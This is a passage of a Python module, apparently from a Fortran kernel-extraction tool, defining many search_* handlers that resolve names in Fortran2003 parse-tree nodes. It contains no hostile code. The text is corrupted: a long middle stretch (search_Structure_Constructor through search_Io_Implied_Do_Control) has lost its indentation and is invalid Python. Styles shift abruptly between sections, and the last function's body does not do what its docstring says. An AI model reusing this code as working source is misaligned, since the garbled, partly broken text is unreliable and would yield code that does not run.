                get_name_or_defer(stmt, item, res_value, config)
        else:
            get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Assignment_Stmt(stmt, node, config, gentype=None):
    """ Identifying a name in Assignment_Stmt node"""
    # LHS is written (STATE_OUT); RHS is read.
    get_name_or_defer(stmt, node.items[0], res_value, config, gentype=KGGenType.STATE_OUT)
    get_name_or_defer(stmt, node.items[2], res_value, config)

def search_Level_2_Expr(stmt, node, config, gentype=None):
    """ Identifying a name in Level_2_Expr node"""
    get_name_or_defer(stmt, node.items[0], res_value, config)
    get_name_or_defer(stmt, node.items[2], res_value, config)

def search_Parenthesis(stmt, node, config, gentype=None):
    """ Identifying a name in Parenthesis node"""
    get_name_or_defer(stmt, node.items[1], res_value, config, gentype=gentype)

def search_str(stmt, string, config, gentype=None):
    # Plain strings in the AST carry no names to resolve.
    pass

def search_Function_Stmt(stmt, node, config, gentype=None):
    """ Identifying a name in Function_Stmt node"""
    get_name_or_defer(stmt, node.items[0], res_derivedtype, config) # prefix
    get_name_or_defer(stmt, node.items[2], res_typedecl, config) # dummy args
    get_name_or_defer(stmt, node.items[3], res_typedecl, config)

def search_Assumed_Shape_Spec(stmt, node, config, gentype=None):
    """ Identifying a name in Assumed_Shape_Spec node"""
    get_name_or_defer(stmt, node.items[0], res_value, config)
    get_name_or_defer(stmt, node.items[1], res_value, config)

def search_Allocate_Stmt(stmt, node, config, gentype=None):
    """ Identifying a name in Allocate_Stmt node"""
    get_name_or_defer(stmt, node.items[0], res_typespec, config)
    get_name_or_defer(stmt, node.items[1], res_typedecl, config)
    defer(stmt, node.items[2], config)

def search_Allocation(stmt, node, config, gentype=None):
    """ Identifying a name in Allocation node"""
    get_name_or_defer(stmt, node.items[0], res_typedecl, config)
    get_name_or_defer(stmt, node.items[1], res_value, config)
    #if len(node.items)>1:
    #    defer_items(stmt, node.items[1:])

def search_Allocate_Shape_Spec(stmt, node, config, gentype=None):
    """ Identifying a name in Allocate_Shape_Spec node"""
    if node.items:
        for item in node.items:
            get_name_or_defer(stmt, item, res_value, config)

def search_Use_Stmt(stmt, node, config, gentype=None):
    """ Identifying a name in Use_Stmt node"""
    # USE associations are resolved elsewhere; nothing to collect here.
    pass

def search_If_Then_Stmt(stmt, node, config, gentype=None):
    """ Identifying a name in If_Then_Stmt node"""
    get_name_or_defer(stmt, node.items[0], res_value, config)

def search_Level_4_Expr(stmt, node, config, gentype=None):
    """ Identifying a name in Level_4_Expr node"""
    get_name_or_defer(stmt, node.items[0], res_value, config)
    get_name_or_defer(stmt, node.items[2], res_value, config)

def search_If_Stmt(stmt, node, config, gentype=None):
    """ Identifying a name in If_Stmt node"""
    get_name_or_defer(stmt, node.items[0], res_value, config)
    get_name_or_defer(stmt, node.items[1], res_value, config)

def search_Else_If_Stmt(stmt, node, config, gentype=None):
    """ Identifying a name in Else_If_Stmt node"""
    get_name_or_defer(stmt, node.items[0], res_value, config)
    get_name_or_defer(stmt, node.items[1], res_value, config)

def search_Else_Stmt(stmt, node, config, gentype=None):
    """ Identifying a name in Else_Stmt node"""
    pass

def search_Level_2_Unary_Expr(stmt, node, config, gentype=None):
    """ Identifying a name in Level_2_Unary_Expr node"""
    get_name_or_defer(stmt, node.items[1], res_value, config)

def search_Label_Do_Stmt(stmt, node, config, gentype=None):
    """ Identifying a name in Label_Do_Stmt node"""
    defer(stmt, node.items[2], config)

def search_Array_Constructor(stmt, node, config, gentype=None):
    """ Identifying a name in Array_Constructor node"""
    get_name_or_defer(stmt, node.items[1], res_value, config)

def search_Array_Section(stmt, node, config, gentype=None):
    """ Identifying a name in Array_Section node"""
    get_name_or_defer(stmt, node.items[0], res_value, config)
    defer(stmt, node.items[1], config)

def search_Substring_Range(stmt, node, config, gentype=None):
    """ Identifying a name in Substring_Range node"""
    get_name_or_defer(stmt, node.items[0], res_value, config)
    get_name_or_defer(stmt, node.items[1], res_value, config)

def search_Select_Case_Stmt(stmt, node, config, gentype=None):
    """ Identifying a name in Select_Case_Stmt node"""
    get_name_or_defer(stmt, node.items[0], res_value, config)

def search_Case_Stmt(stmt, node, config, gentype=None):
    """ Identifying a name in Case_Stmt node"""
    get_name_or_defer(stmt, node.items[0], res_value, config)

def search_Case_Selector(stmt, node, config, gentype=None):
    """ Identifying a name in Case_Selector node"""
    get_name_or_defer(stmt, node.items[0], res_value, config)

def search_Call_Stmt(stmt, node, config, gentype=None):
    """ Identifying a name in Call_Stmt node"""
    # items[0] = subroutine designator, items[1] = actual argument list
    get_name_or_defer(stmt, node.items[0], res_subroutine, config)
    #if isinstance(node.items[1], Fortran2003.Name):
    #    get_name_or_defer(stmt, node.items[1], res_value)
    #else:
    #    defer(stmt, node.items[1])
    get_name_or_defer(stmt, node.items[1], res_value, config)

def search_Char_Literal_Constant(stmt, node, config, gentype=None):
    """ Identifying a name in Char_Literal_Constant node"""
    # items[1] is the kind-parameter name, when present
    if node.items[1]:
        get_name_or_defer(stmt, Fortran2003.Name(node.items[1]), res_typedecl, config)
    #get_name_or_defer(stmt, node.items[0], res_typedecl)

def search_Length_Selector(stmt, node, config, gentype=None):
    """ Identifying a name in Length_Selector node"""
    for item in node.items:
        get_name_or_defer(stmt, item, res_value, config)

def search_Type_Param_Value(stmt, node, config, gentype=None):
    """ Identifying a name in Type_Param_Value node"""
    # NOTE: need to verify its content structure
    if node.item:
        get_name_or_defer(stmt, node.item, res_value, config)

def search_Write_Stmt(stmt, node, config, gentype=None):
    """ Identifying a name in Write_Stmt node"""
    get_name_or_defer(stmt, node.items[0], res_value, config)
    get_name_or_defer(stmt, node.items[1], res_value, config)

def search_Read_Stmt(stmt, node, config, gentype=None):
    """ Identifying a name in Read_Stmt node"""
    get_name_or_defer(stmt, node.items[0], res_value, config)
    get_name_or_defer(stmt, node.items[1], res_value, config)
    get_name_or_defer(stmt, node.items[2], res_value, config)

def search_Io_Control_Spec(stmt, node, config, gentype=None):
    """ Identifying a name in Io_Control_Spec node"""
    get_name_or_defer(stmt, node.items[1], res_value, config)

def search_Stop_Stmt(stmt, node, config, gentype=None):
    """ Identifying a name in Stop_Stmt node"""
    pass

def search_Contains_Stmt(stmt, node, config, gentype=None):
    """ Identifying a name in Contains_Stmt node"""
    pass

def search_Subscript_Triplet(stmt, node, config, gentype=None):
    """ Identifying a name in Subscript_Triplet node"""
    get_name_or_defer(stmt, node.items[0], res_value, config)
    get_name_or_defer(stmt, node.items[1], res_value, config)
    get_name_or_defer(stmt, node.items[2], res_value, config)

def search_Interface_Stmt(stmt, node, config, gentype=None):
    """ Identifying a name in Interface_Stmt node"""
    pass

def search_Procedure_Stmt(stmt, node, config, gentype=None):
    """ Identifying a name in Procedure_Stmt node"""
    get_name_or_defer(stmt, node.items[0], res_subprogram, config)
def search_Prefix(stmt, node, config, gentype=None):
    """ Identifying a name in Prefix node"""
    # BUG FIX: the loop previously passed node.items[0] on every
    # iteration, so only the first prefix spec was ever searched.
    for item in node.items:
        get_name_or_defer(stmt, item, res_anything, config)
def search_Prefix_Spec(stmt, node, config, gentype=None):
    """ Identifying a name in Prefix_Spec node"""
    # Prefix specs (PURE/ELEMENTAL/RECURSIVE keywords) carry no names;
    # any item/items attribute here is unexpected.
    # NOTE(review): ProgramException is not defined or imported in this
    # module, so this branch would actually surface as a NameError —
    # confirm the intended exception class.
    if node.item or hasattr(node, 'items'):
        raise ProgramException('Unexpected item or items attr')
def search_Logical_Literal_Constant(stmt, node, config, gentype=None):
    """ Identifying a name in Logical_Literal_Constant node"""
    # items[1] is the kind-parameter name, when present
    if node.items[1]:
        get_name_or_defer(stmt, Fortran2003.Name(node.items[1]), res_typedecl, config)
    #get_name_or_defer(stmt, node.items[1], res_typedecl)

def search_Access_Spec(stmt, node, config, gentype=None):
    """ Identifying a name in Access_Spec node"""
    pass

def search_And_Operand(stmt, node, config, gentype=None):
    """ Identifying a name in And_Operand node"""
    get_name_or_defer(stmt, node.items[1], res_value, config)

def search_Equiv_Operand(stmt, node, config, gentype=None):
    """ Identifying a name in Equiv_Operand node"""
    get_name_or_defer(stmt, node.items[0], res_value, config)
    get_name_or_defer(stmt, node.items[2], res_value, config)

def search_Or_Operand(stmt, node, config, gentype=None):
    """ Identifying a name in Or_Operand node"""
    get_name_or_defer(stmt, node.items[0], res_value, config)
    get_name_or_defer(stmt, node.items[2], res_value, config)

def search_Where_Construct_Stmt(stmt, node, config, gentype=None):
    """ Identifying a name in Where_Construct_Stmt node"""
    get_name_or_defer(stmt, node.items[0], res_value, config)

def search_Elsewhere_Stmt(stmt, node, config, gentype=None):
    """ Identifying a name in Elsewhere_Stmt node"""
    get_name_or_defer(stmt, node.items[1], res_value, config)

def search_Suffix(stmt, node, config, gentype=None):
    """ Identifying a name in Suffix node"""
    get_name_or_defer(stmt, node.items[0], res_value, config)
    get_name_or_defer(stmt, node.items[1], res_value, config)

def search_Declaration_Type_Spec(stmt, node, config, gentype=None):
    """ Identifying a name in Declaration_Type_Spec node"""
    get_name_or_defer(stmt, node.items[1], res_derivedtype, config)
def search_Data_Ref(stmt, node, config, gentype=None):
    """ Identifying a name in Data_Ref node

    Walks an a%b(i)%c-style reference.  Only the leading part inherits
    the caller's gentype so state saving stays limited to the base
    object; trailing parts contribute only their subscript names.
    """
    from fortlab.kgutils import KGName
    # NOTE: to limit the scope of data saving in derived type,
    # the last part_ref would be the one that has config, gentype=gentype
    if isinstance(node.items[0], Fortran2003.Name):
        get_name_or_defer(stmt, node.items[0], res_value, config, gentype=gentype)
    elif isinstance(node.items[0], Fortran2003.Part_Ref):
        get_name_or_defer(stmt, node.items[0].items[0], res_value, config, gentype=gentype)
        get_name_or_defer(stmt, node.items[0].items[1], res_value, config)
    for item in node.items[1:]:
        if isinstance(item, Fortran2003.Name): pass
        elif isinstance(item, Fortran2003.Part_Ref):
            get_name_or_defer(stmt, item.items[1], res_value, config)
        elif item is None: pass
        else:
            # BUG FIX: was `item.__class` (no such attribute), which raised
            # AttributeError while formatting the message; and
            # ProgramException is not defined in this module, which would
            # have raised NameError.  SearchException is this module's own
            # search-failure exception.
            raise SearchException('Unknown type: %s' % item.__class__)
def search_Structure_Constructor(stmt, node, config, gentype=None):
""" Identifying a name in Structure_Constructor node"""
#get_name_or_defer(stmt, node.items[0], res_derivedtype)
# NOTE: parser found ordinary subprogram as Structure_Constructor
get_name_or_defer(stmt, node.items[0], res_value + res_derivedtype, config)
get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Binary_Constant(stmt, node, config, gentype=None):
""" Identifying a name in Binary_Constant node"""
pass
def search_Octal_Constant(stmt, node, config, gentype=None):
""" Identifying a name in Octal_Constant node"""
pass
def search_Hex_Constant(stmt, node, config, gentype=None):
""" Identifying a name in Hex_Constant node"""
pass
def search_Intrinsic_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Intrinsic_Stmt node"""
pass
#get_name_or_defer(stmt, node.items[1], res_subprogram)
def search_Derived_Type_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Derived_Type_Stmt node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
get_name_or_defer(stmt, node.items[2], res_value, config)
def search_Access_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Access_Stmt node"""
get_name_or_defer(stmt, node.items[1], res_anything, config)
def search_Function_Reference(stmt, node, config, gentype=None):
""" Identifying a name in Function_Reference node"""
get_name_or_defer(stmt, node.items[0], res_function, config)
get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Return_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Return_Stmt node"""
get_name_or_defer(stmt, node.items[0], res_function, config)
def search_Print_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Print_Stmt node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Format(stmt, node, config, gentype=None):
""" Identifying a name in Format node"""
if hasattr(node, 'items') and len(node.items)>0:
get_name_or_defer(stmt, node.items[0], res_value, config)
def search_Implicit_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Implicit_Stmt node"""
if hasattr(node, 'items') and len(node.items)>0:
get_name_or_defer(stmt, node.items[0], res_value, config)
def search_Exit_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Exit_Stmt node"""
pass
def search_Pointer_Assignment_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Pointer_Assignment_Stmt node"""
get_name_or_defer(stmt, node.items[0], res_ptr_object, config) # data pointer obj or procedure pointer obj
get_name_or_defer(stmt, node.items[2], res_target, config) # data target or procedure target
def search_Proc_Component_Ref(stmt, node, config, gentype=None):
""" Identifying a name in Proc_Component_Ref node"""
get_name_or_defer(stmt, node.items[0], res_value, config, gentype=gentype)
# Type definition may handle a procedure component name?
#get_name_or_defer(stmt, node.items[2], res_value)
def search_Io_Unit(stmt, node, config, gentype=None):
""" Identifying a name in Io_Unit node"""
if hasattr(node, 'items') and len(node.items)>0:
get_name_or_defer(stmt, node.items[0], res_value, config)
def search_Level_3_Expr(stmt, node, config, gentype=None):
""" Identifying a name in Level_3_Expr node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
get_name_or_defer(stmt, node.items[2], res_value, config)
def search_Open_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Open_Stmt node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Connect_Spec(stmt, node, config, gentype=None):
""" Identifying a name in Connect_Spec node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Endfile_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Endfile_Stmt node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Position_Spec(stmt, node, config, gentype=None):
""" Identifying a name in Position_Spec node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Close_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Close_Stmt node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Close_Spec(stmt, node, config, gentype=None):
""" Identifying a name in Close_Spec node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Label(stmt, node, config, gentype=None):
""" Identifying a name in Label node"""
pass
def search_Io_Implied_Do(stmt, node, config, gentype=None):
""" Identifying a name in Io_Implied_Do node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Io_Implied_Do_Control(stmt, node, config, gentype=None):
""" Identifying a name in Io_Implied_Do_Control node"""
get_name_or_defer(stmt, node.items[0], res_typedecl, config, gentype=KGGenType.STATE_OUT)
get_name_or_defer(stmt, node.items[1], res_value, config)
get_name_or_defer(stmt, node.items[2], res_value, config)
get_name_or_defer(stmt, node.items[3], res_value, config)
def search_Format_Stmt(stmt, node, config, gentype=None):
    """Resolve names appearing in a Format_Stmt node."""
    get_name_or_defer(stmt, node.items[0], res_value, config)
    # items[1] (the format-item list) is deliberately not searched.

def search_Format_Specification(stmt, node, config, gentype=None):
    """Resolve names appearing in a Format_Specification node."""
    for idx in (0, 1, 2):
        get_name_or_defer(stmt, node.items[idx], res_value, config)

def search_Format_Item_C1002(stmt, node, config, gentype=None):
    """Resolve names appearing in a Format_Item_C1002 node."""
    for idx in (0, 1):
        get_name_or_defer(stmt, node.items[idx], res_value, config)

def search_Control_Edit_Desc(stmt, node, config, gentype=None):
    """Resolve names appearing in a Control_Edit_Desc node."""
    for idx in (0, 1):
        get_name_or_defer(stmt, node.items[idx], res_value, config)

def search_Format_Item(stmt, node, config, gentype=None):
    """Resolve names appearing in a Format_Item node."""
    for idx in (0, 1):
        get_name_or_defer(stmt, node.items[idx], res_value, config)
# NOTE(review): a duplicate definition of search_Alloc_Opt used to live here.
# It was shadowed by the later definition in this module (which searches only
# the option value, items[1]), so this first copy was dead code and has been
# removed.

def search_Deallocate_Stmt(stmt, node, config, gentype=None):
    """Resolve names appearing in a Deallocate_Stmt node."""
    get_name_or_defer(stmt, node.items[0], res_value, config)
    get_name_or_defer(stmt, node.items[1], res_value, config)

def search_Cycle_Stmt(stmt, node, config, gentype=None):
    """A Cycle_Stmt node carries no name that needs resolution."""

def search_External_Stmt(stmt, node, config, gentype=None):
    """Resolve the external names (items[1]) against declarations,
    functions and subroutines."""
    get_name_or_defer(stmt, node.items[1], \
        [ TypeDeclarationStatement, Function, Subroutine ], config)
def search_Case_Value_Range(stmt, node, config, gentype=None):
    """Resolve names appearing in a Case_Value_Range node."""
    for idx in (0, 1):
        get_name_or_defer(stmt, node.items[idx], res_value, config)

def search_Forall_Construct_Stmt(stmt, node, config, gentype=None):
    """Resolve names appearing in a Forall_Construct_Stmt node."""
    get_name_or_defer(stmt, node.items[1], res_value, config)

def search_Forall_Header(stmt, node, config, gentype=None):
    """Resolve names appearing in a Forall_Header node."""
    for idx in (0, 1):
        get_name_or_defer(stmt, node.items[idx], res_value, config)

def search_Forall_Triplet_Spec(stmt, node, config, gentype=None):
    """Resolve names appearing in a Forall_Triplet_Spec node."""
    for idx in (0, 1, 2, 3):
        get_name_or_defer(stmt, node.items[idx], res_value, config)

def search_Goto_Stmt(stmt, node, config, gentype=None):
    """A Goto_Stmt node carries no name that needs resolution."""

def search_Continue_Stmt(stmt, node, config, gentype=None):
    """A Continue_Stmt node carries no name that needs resolution."""

def search_Wait_Stmt(stmt, node, config, gentype=None):
    """Resolve names appearing in a Wait_Stmt node."""
    get_name_or_defer(stmt, node.items[1], res_value, config)

def search_Wait_Spec(stmt, node, config, gentype=None):
    """Resolve names in every item of a Wait_Spec node, if any."""
    for subnode in getattr(node, 'items', ()):
        get_name_or_defer(stmt, subnode, res_value, config)

def search_Rewind_Stmt(stmt, node, config, gentype=None):
    """Resolve names appearing in a Rewind_Stmt node."""
    for idx in (0, 1):
        get_name_or_defer(stmt, node.items[idx], res_value, config)

def search_Flush_Stmt(stmt, node, config, gentype=None):
    """Resolve names appearing in a Flush_Stmt node."""
    for idx in (0, 1):
        get_name_or_defer(stmt, node.items[idx], res_value, config)

def search_Import_Stmt(stmt, node, config, gentype=None):
    """Resolve the imported names (items[1]) against any resolver."""
    get_name_or_defer(stmt, node.items[1], res_anything, config)

def search_Block_Data_Stmt(stmt, node, config, gentype=None):
    """Resolve names appearing in a Block_Data_Stmt node.

    NOTE: temporary solution - no resolution is performed yet.
    """
def search_Data_Stmt(stmt, node, config, gentype=None):
    """Resolve every item of a Data_Stmt node against type declarations."""
    for subnode in getattr(node, 'items', ()):
        get_name_or_defer(stmt, subnode, res_typedecl, config)

def search_Data_Stmt_Value(stmt, node, config, gentype=None):
    """Resolve names appearing in a Data_Stmt_Value node."""
    for idx in (0, 1):
        get_name_or_defer(stmt, node.items[idx], res_typedecl, config)

def search_Save_Stmt(stmt, node, config, gentype=None):
    """Resolve the saved entities (items[1]) against type declarations."""
    get_name_or_defer(stmt, node.items[1], res_typedecl, config)

def search_Asynchronous_Stmt(stmt, node, config, gentype=None):
    """Resolve names appearing in an Asynchronous_Stmt node."""
    get_name_or_defer(stmt, node.items[1], res_typedecl, config)

def search_Allocatable_Stmt(stmt, node, config, gentype=None):
    """Resolve names appearing in an Allocatable_Stmt node."""
    get_name_or_defer(stmt, node.items[1], res_typedecl, config)

def search_Common_Stmt(stmt, node, config, gentype=None):
    """Resolve the object list of each common block in a Common_Stmt node."""
    for itemlist in getattr(node, 'items', ()):
        for _name, subnode in itemlist:
            get_name_or_defer(stmt, subnode, res_value, config)

def search_Data_Stmt_Set(stmt, node, config, gentype=None):
    """Resolve names appearing in a Data_Stmt_Set node."""
    for idx in (0, 1):
        get_name_or_defer(stmt, node.items[idx], res_value, config)

def search_Dimension_Stmt(stmt, node, config, gentype=None):
    """Resolve the declaration list of each entry in a Dimension_Stmt node."""
    for itemlist in getattr(node, 'items', ()):
        for _name, subnode in itemlist:
            get_name_or_defer(stmt, subnode, res_value, config)

def search_Equivalence_Stmt(stmt, node, config, gentype=None):
    """Resolve names appearing in an Equivalence_Stmt node."""
    get_name_or_defer(stmt, node.items[1], res_typedecl, config)

def search_Equivalence_Set(stmt, node, config, gentype=None):
    """Resolve names appearing in an Equivalence_Set node."""
    for idx in (0, 1):
        get_name_or_defer(stmt, node.items[idx], res_typedecl, config)

def search_Intent_Stmt(stmt, node, config, gentype=None):
    """Resolve the dummy-argument names (items[1]) of an Intent_Stmt node."""
    # items[0] is the intent-spec itself and is intentionally not searched
    get_name_or_defer(stmt, node.items[1], res_typedecl, config)

def search_Intent_Spec(stmt, node, config, gentype=None):
    """An Intent_Spec node carries no name that needs resolution."""
def search_Namelist_Stmt(stmt, node, config, gentype=None):
    """Resolve the group-object list of each namelist in a Namelist_Stmt."""
    for _nlname, nlgroup in getattr(node, 'items', ()):
        get_name_or_defer(stmt, nlgroup, res_typedecl, config)

def search_Optional_Stmt(stmt, node, config, gentype=None):
    """Resolve names appearing in an Optional_Stmt node."""
    get_name_or_defer(stmt, node.items[1], res_typedecl, config)

def search_Pointer_Stmt(stmt, node, config, gentype=None):
    """Resolve the pointer names (items[1]) against any resolver."""
    get_name_or_defer(stmt, node.items[1], res_anything, config)

def search_Protected_Stmt(stmt, node, config, gentype=None):
    """Resolve names appearing in a Protected_Stmt node."""
    get_name_or_defer(stmt, node.items[1], res_typedecl, config)

def search_Target_Stmt(stmt, node, config, gentype=None):
    """Resolve names appearing in a Target_Stmt node."""
    get_name_or_defer(stmt, node.items[0], res_anything, config)

def search_Target_Entity_Decl(stmt, node, config, gentype=None):
    """Resolve names appearing in a Target_Entity_Decl node."""
    get_name_or_defer(stmt, node.items[0], res_anything, config)
    defer(stmt, node.items[1], config)
    for idx in (2, 3):
        get_name_or_defer(stmt, node.items[idx], res_value, config)

def search_Volatile_Stmt(stmt, node, config, gentype=None):
    """Resolve names appearing in a Volatile_Stmt node."""
    get_name_or_defer(stmt, node.items[1], res_anything, config)

def search_Value_Stmt(stmt, node, config, gentype=None):
    """Resolve names appearing in a Value_Stmt node."""
    get_name_or_defer(stmt, node.items[1], res_typedecl, config)

def search_Backspace_Stmt(stmt, node, config, gentype=None):
    """Resolve names appearing in a Backspace_Stmt node."""
    for idx in (0, 1):
        get_name_or_defer(stmt, node.items[idx], res_value, config)

def search_Forall_Stmt(stmt, node, config, gentype=None):
    """Resolve names appearing in a Forall_Stmt node."""
    for idx in (0, 1):
        get_name_or_defer(stmt, node.items[idx], res_value, config)

def search_Inquire_Stmt(stmt, node, config, gentype=None):
    """Resolve names appearing in an Inquire_Stmt node."""
    for idx in (0, 1, 2):
        get_name_or_defer(stmt, node.items[idx], res_value, config)

def search_Inquire_Spec(stmt, node, config, gentype=None):
    """Resolve names appearing in an Inquire_Spec node."""
    for idx in (0, 1):
        get_name_or_defer(stmt, node.items[idx], res_value, config)

def search_Nullify_Stmt(stmt, node, config, gentype=None):
    """Resolve names appearing in a Nullify_Stmt node."""
    for idx in (0, 1):
        get_name_or_defer(stmt, node.items[idx], res_value, config)

def search_Where_Stmt(stmt, node, config, gentype=None):
    """Resolve names appearing in a Where_Stmt node."""
    for idx in (0, 1):
        get_name_or_defer(stmt, node.items[idx], res_value, config)
def search_Arithmetic_If_Stmt(stmt, node, config, gentype=None):
    """Resolve names appearing in an Arithmetic_If_Stmt node."""
    for idx in (0, 1, 2, 3):
        get_name_or_defer(stmt, node.items[idx], res_value, config)

def search_Computed_Goto_Stmt(stmt, node, config, gentype=None):
    """Resolve names appearing in a Computed_Goto_Stmt node."""
    for idx in (0, 1):
        get_name_or_defer(stmt, node.items[idx], res_value, config)

def search_Actual_Arg_Spec(stmt, node, config, gentype=None):
    """Resolve the actual-argument value (items[1]) of an Actual_Arg_Spec."""
    get_name_or_defer(stmt, node.items[1], res_value, config)

def search_Data_Pointer_Object(stmt, node, config, gentype=None):
    """Resolve names appearing in a Data_Pointer_Object node."""
    get_name_or_defer(stmt, node.items[0], res_value, config, gentype=gentype)
    component = node.items[2]
    # component parts are only searched when they are not bare Name nodes
    if component and not isinstance(component, Fortran2003.Name):
        get_name_or_defer(stmt, component, res_value, config)

def search_Type_Attr_Spec(stmt, node, config, gentype=None):
    """Resolve names appearing in a Type_Attr_Spec node."""
    if isinstance(node.items[0], str) and node.items[0]=='EXTENDS':
        # EXTENDS(parent) references a derived-type name
        get_name_or_defer(stmt, node.items[1], res_derivedtype, config)
    else:
        for idx in (0, 1):
            get_name_or_defer(stmt, node.items[idx], res_value, config)

def search_Level_5_Expr(stmt, node, config, gentype=None):
    """Resolve the two operands (items[0] and items[2]) of a Level_5_Expr."""
    for idx in (0, 2):
        get_name_or_defer(stmt, node.items[idx], res_value, config)

def search_Parameter_Stmt(stmt, node, config, gentype=None):
    """Resolve names appearing in a Parameter_Stmt node."""
    get_name_or_defer(stmt, node.items[1], res_value, config)

def search_Named_Constant_Def(stmt, node, config, gentype=None):
    """Resolve names appearing in a Named_Constant_Def node."""
    for idx in (0, 1):
        get_name_or_defer(stmt, node.items[idx], res_value, config)

def search_Saved_Entity(stmt, node, config, gentype=None):
    """Resolve names in a Saved_Entity node; /name/ denotes a common block."""
    if len(node.items)==3 and node.items[0]=='/' and node.items[2]=='/':
        get_name_or_defer(stmt, node.items[1], res_common, config)
    else:
        for subnode in node.items:
            get_name_or_defer(stmt, subnode, res_value, config)
def search_Alloc_Opt(stmt, node, config, gentype=None):
    """Resolve the option value (items[1]) of an Alloc_Opt node."""
    get_name_or_defer(stmt, node.items[1], res_value, config)

def search_Dealloc_Opt(stmt, node, config, gentype=None):
    """Resolve the option value (items[1]) of a Dealloc_Opt node."""
    get_name_or_defer(stmt, node.items[1], res_value, config)

def search_Generic_Spec(stmt, node, config, gentype=None):
    """A Generic_Spec node carries no name that needs resolution."""

def search_Assumed_Size_Spec(stmt, node, config, gentype=None):
    """Resolve names appearing in an Assumed_Size_Spec node."""
    for idx in (0, 1):
        get_name_or_defer(stmt, node.items[idx], res_value, config)

def search_Common_Block_Object(stmt, node, config, gentype=None):
    """Resolve names appearing in a Common_Block_Object node."""
    for idx in (0, 1):
        get_name_or_defer(stmt, node.items[idx], res_value, config)
def search_Ac_Implied_Do(stmt, node, config, gentype=None):
    """Resolve names appearing in an Ac_Implied_Do node."""
    for idx in (0, 1):
        get_name_or_defer(stmt, node.items[idx], res_value, config)

def search_Ac_Implied_Do_Control(stmt, node, config, gentype=None):
    """Resolve names in an Ac_Implied_Do_Control node.

    The do-variable (items[0]) is written by the implied do and is
    resolved with a state-out generation type.
    """
    get_name_or_defer(stmt, node.items[0], res_value, config, gentype=KGGenType.STATE_OUT)
    for subnode in (node.items[1] or ()):
        get_name_or_defer(stmt, subnode, res_value, config)

def search_Specific_Binding(stmt, node, config, gentype=None):
    """Resolve names in a Specific_Binding node: interface name, binding
    attributes, and the bound procedure name."""
    get_name_or_defer(stmt, node.items[0], res_typespec + [ Interface ], config)
    get_name_or_defer(stmt, node.items[1], res_value, config)
    attrs = node.items[1]
    # a non-DEFERRED binding maps onto an actual subprogram
    if not hasattr(attrs, 'string') or 'DEFERRED' not in attrs.string:
        target = node.items[2] if node.items[3] is None else node.items[3]
        get_name_or_defer(stmt, target, res_subprogram, config)

def search_Binding_Attr(stmt, node, config, gentype=None):
    """A Binding_Attr node carries no name that needs resolution."""

def search_Masked_Elsewhere_Stmt(stmt, node, config, gentype=None):
    """Resolve the mask expression of a Masked_Elsewhere_Stmt node."""
    get_name_or_defer(stmt, node.items[0], res_value, config)

def search_Procedure_Designator(stmt, node, config, gentype=None):
    """Resolve the designated object (items[0]) of a Procedure_Designator."""
    get_name_or_defer(stmt, node.items[0], res_value, config)

def search_Associate_Stmt(stmt, node, config, gentype=None):
    """Resolve names appearing in an Associate_Stmt node."""
    get_name_or_defer(stmt, node.items[1], res_value, config)

def search_Association(stmt, node, config, gentype=None):
    """Resolve the selector expression (items[2]) of an Association node."""
    get_name_or_defer(stmt, node.items[2], res_value, config)

def search_Generic_Binding(stmt, node, config, gentype=None):
    """Resolve names appearing in a Generic_Binding node."""
    get_name_or_defer(stmt, node.items[0], res_value, config)
    get_name_or_defer(stmt, node.items[2], [ SpecificBinding ], config)

def search_Complex_Literal_Constant(stmt, node, config, gentype=None):
    """Resolve the real and imaginary parts of a Complex_Literal_Constant."""
    for idx in (0, 1):
        get_name_or_defer(stmt, node.items[idx], res_value, config)

def search_Char_Length(stmt, node, config, gentype=None):
    """Resolve the length expression (items[1]) of a Char_Length node."""
    get_name_or_defer(stmt, node.items[1], res_value, config)

def search_Data_Implied_Do(stmt, node, config, gentype=None):
    """Resolve names in a Data_Implied_Do node; the do-variable (items[1])
    is written by the loop, hence state-out."""
    get_name_or_defer(stmt, node.items[0], res_value, config)
    get_name_or_defer(stmt, node.items[1], res_value, config, gentype=KGGenType.STATE_OUT)
    for idx in (2, 3, 4):
        get_name_or_defer(stmt, node.items[idx], res_value, config)

def search_Ac_Spec(stmt, node, config, gentype=None):
    """Resolve names appearing in an Ac_Spec node."""
    defer(stmt, node.items[0], config)
    get_name_or_defer(stmt, node.items[1], res_value, config)

def search_Sequence_Stmt(stmt, node, config, gentype=None):
    """A Sequence_Stmt node carries no name that needs resolution."""
def search_Stmt_Function_Stmt(stmt, node, config, gentype=None):
    """Resolve names appearing in a Stmt_Function_Stmt node."""
    get_name_or_defer(stmt, node.items[0], res_typedecl, config)

def search_Language_Binding_Spec(stmt, node, config, gentype=None):
    """A Language_Binding_Spec needs no resolution: external C library
    routines are not resolved."""

def search_Select_Type_Stmt(stmt, node, config, gentype=None):
    """Resolve the selector (items[1]) of a Select_Type_Stmt node."""
